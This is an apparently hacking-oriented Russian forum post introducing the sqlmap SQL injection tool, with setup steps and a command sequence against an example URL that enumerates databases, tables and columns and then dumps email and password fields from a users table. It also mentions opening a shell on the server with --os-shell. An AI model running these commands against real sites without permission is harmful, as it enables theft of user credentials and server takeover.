sqlmap
Автор: SyGaK | Дата: 28-12-2013, 07:16 | Комментариев: 0 | Просмотров: 27 486
sqlmap - это кроссплатформенная утилита (ЯП: python), позволяющая тестировать сайты на SQLi (SQL Injection) с огромным списком возможностей.
[#] - Для работы вам нужно скачать интерпретатор python, подойдет как 2, так и 3 ветка.
[#] - http://sqlmap.org/ - ссылка на официальный сайт.
[#] - Зеркало на скачку (последняя версия, на момент поста) - скачать.
[#] - После установки интерпретатора, запускаете утилиту через cmd (Windows(WIN + R -> cmd -> cd C:\sqlmap -> python sqlmap.py или же просто sqlmap.py)) или через Терминал (linux). Где C:\sqlmap - директория, где лежит сам sqlmap.
[#] - Для havij-юзеров: sqlmap.py -u http://test.org/index.php?id=555 --dbs (после -u URL, команда --dbs извлекает список БД. Далее sqlmap.py -u http://test.org/index.php?id=555 -D forum --tables. -D текущая БД, --tables извлекает из выбранной БД (в нашем случае из БД forum) список таблиц. Далее sqlmap.py -u http://test.org/index.php?id=555 -D forum -T users --columns. команда --columns извлекает список колонок из выбранной нами таблицы БД (в нашем случае users). Далее sqlmap.py -u http://test.org/index.php?id=555 -D forum -T users -C email,password --dump. Командой --dump дампим все значения выбранных нами колонок (в нашем случае email и password) из таблицы).
[#] - Поддерживает многопоточность (до 10 потоков).
[#] - Загрузка мини-шелла (если позволяют привелегии), командой --os-shell.
[#] - etc.
[#] - Мануал по софту на хабре.
[#] - Мануал по софту на ксакеп.ру.
Пароль на все архивы: hh
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
